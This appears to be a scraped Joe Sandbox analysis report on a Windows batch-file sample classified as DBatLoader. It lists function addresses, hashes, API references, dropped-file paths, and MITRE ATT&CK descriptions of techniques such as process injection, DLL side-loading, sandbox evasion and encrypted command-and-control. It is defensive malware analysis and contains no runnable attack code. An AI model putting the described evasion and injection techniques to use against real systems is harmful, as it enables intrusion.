Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: b6830b3e9d6891c1606c0558841f1da4350204044e4de2f21f2db8019276d9fa
Instruction ID: 7a0757d37afb60cab30fe9307f88379dbdff6631a451916c2a4dc3c31c37de7b
Opcode Fuzzy Hash: b6830b3e9d6891c1606c0558841f1da4350204044e4de2f21f2db8019276d9fa
Instruction Fuzzy Hash: 9F216875A006189FDF21EBA8C881AFEB3F9EF48710F4500E5E909E7341D6309E04CBA5

Function 02B86444 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 02B8644D
TlsGetValue.KERNEL32(0000001D), ref: 02B86462

Strings

@m, xrefs: 02B86467

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: AllocValue
String ID: @m
API String ID: 1189806713-3165096455
Opcode ID: 488dc9f0e3bf28e9b7cdfe9650ffc9f4a80cabc78fcd8c6b3b390eded8e093ab
Instruction ID: 454da917e5ea90792aad4ba5576225e421425af39b2a1246edd7f7ac5161304d
Opcode Fuzzy Hash: 488dc9f0e3bf28e9b7cdfe9650ffc9f4a80cabc78fcd8c6b3b390eded8e093ab
Instruction Fuzzy Hash: 51C04CB1E403128AFF05BBB9D40570D379EEB00385F089DA5B418CB549EB75D451DF55

Function 02B9AD64 Relevance: 5.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 02B9AD98
IsBadWritePtr.KERNEL32(?,00000004), ref: 02B9ADC8
IsBadReadPtr.KERNEL32(?,00000008), ref: 02B9ADE7
IsBadReadPtr.KERNEL32(?,00000004), ref: 02B9ADF3

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: Read$Write
String ID:
API String ID: 3448952669-0
Opcode ID: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
Instruction ID: 97d01d2c2ef992594f9a9b27b11ef196e9b375d8277034a169d8aa97b584b2c6
Opcode Fuzzy Hash: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
Instruction Fuzzy Hash: E92184B1A40219DBDF10DF69CC80BAE77B9EF44352F1042A1EE5497344EB34D911DAA0

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO#5_tower_Dec162024.cmd

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DBatLoader

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_x.exe_cda35a32461957b827c9f2408e85ccfa22b656_a734f2ad_909ad5be-1645-4108-b456-5da8ed9904cf\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER23EE.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2CAA.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D08.tmp.xml

C:\Users\user\AppData\Local\Temp\x.exe

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
PO#5_tower_Dec162024.cmd

Function 02B9EC74 Relevance: 243.3, APIs: 11, Strings: 122, Instructions: 10535
filesleepCOMMON

Function 02B85A78 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Function 02B9EBF0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28
libraryloaderCOMMON

Function 02B9DBB0 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Function 02B9E2F8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111
networkCOMMON

Function 02B97D00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49
nativeCOMMON

Function 02B81724 Relevance: 9.0, APIs: 7, Instructions: 289
sleepCOMMON

Function 02B9870C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35
libraryCOMMON

Function 02B81A8C Relevance: 7.7, APIs: 6, Instructions: 175
sleepCOMMON

Function 02B9E2F6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112
networkCOMMON

Function 02B8E2EC Relevance: 4.5, APIs: 3, Instructions: 45
COMMON

Function 02B84CFC Relevance: 4.5, APIs: 3, Instructions: 24
memoryCOMMON

Function 02B97064 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256
COMMON

Function 02B98824 Relevance: 3.1, APIs: 2, Instructions: 65
libraryCOMMON

Function 02B8E6E8 Relevance: 3.1, APIs: 2, Instructions: 63
COMMON